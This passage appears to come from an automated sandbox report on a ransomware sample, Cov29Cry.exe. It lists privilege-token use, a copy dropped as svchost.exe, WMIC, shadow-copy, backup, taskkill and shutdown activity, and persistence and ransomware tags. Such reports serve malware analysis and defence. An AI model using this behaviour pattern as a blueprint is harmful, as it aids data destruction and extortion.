N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 1216 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 1216 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4208 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4080 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 4080 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2580 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

